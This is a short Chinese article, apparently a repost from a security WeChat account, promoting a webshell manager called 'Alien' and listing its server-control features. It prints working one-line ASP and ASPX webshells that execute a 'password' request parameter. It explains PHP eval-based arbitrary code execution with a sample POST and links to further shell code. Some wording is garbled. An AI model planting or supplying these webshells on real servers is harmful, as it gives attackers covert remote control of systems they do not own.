项目简介
语言
功能
File Manager (可显示图片, 可SearchFile)
虚拟终端
数据库
注册表
监控
截图
系统信息
项目描述
一句话木马
一句话木马是在渗透测试中用来控制服务器的工具
强大之处在于木马本身体积小,不易发现
以下是最简单的一句话木马
PHP ASP <%execute(request("password"))%> ASPX <%@ Page Language="Jscript"%><%eval(Request.Item["password"])%>当然, Alien还可以使用asmx, ashx等等的Webshell。 NodeJS和JSP https://github.com/malbuffer4pt/Alien/blob/main/shell.txt关于JSP webshell
目前只有比较原始的菜刀版本, 之后可能会加上蚁剑和冰蝎
shell有进行更改, 新增了可以显示图片的功能
关于NodeJS webshell
由于NodeJS特性, 原理跟一般php asp aspx等动态语言的shell不同,
NodeJS目的重在管理而非渗透
伺服器
Windows, Linux, Unix, MacOS
Database管理
MySQL :PHP 交通
原理
以PHP为例子, eval()可以把string以PHP Code去执行,
如果eval()中带有可控变量,那么就可以执行任意代码。
如eval($_POST['a']);
HTTP POST a=phpinfo(); 就可以执行phpinfo();
注意!
工具Payloads文件夹内有符合恶意程序的Payload, 可能会被防毒删除
目前只有删减版,但部份代码没有删除,Disassemble应该会有奇怪但无法使用的东西
图片
审核编辑:刘清
-
Linux系统
+关注
关注
4文章
593浏览量
27392 -
SQL
+关注
关注
1文章
762浏览量
44117 -
PHP
+关注
关注
0文章
452浏览量
26678 -
伺服器
+关注
关注
1文章
151浏览量
19473 -
Shell
+关注
关注
1文章
365浏览量
23357
原文标题:一款新的webshell管理工具
文章出处:【微信号:菜鸟学安全,微信公众号:菜鸟学安全】欢迎添加关注!文章转载请注明出处。
发布评论请先 登录
相关推荐
评论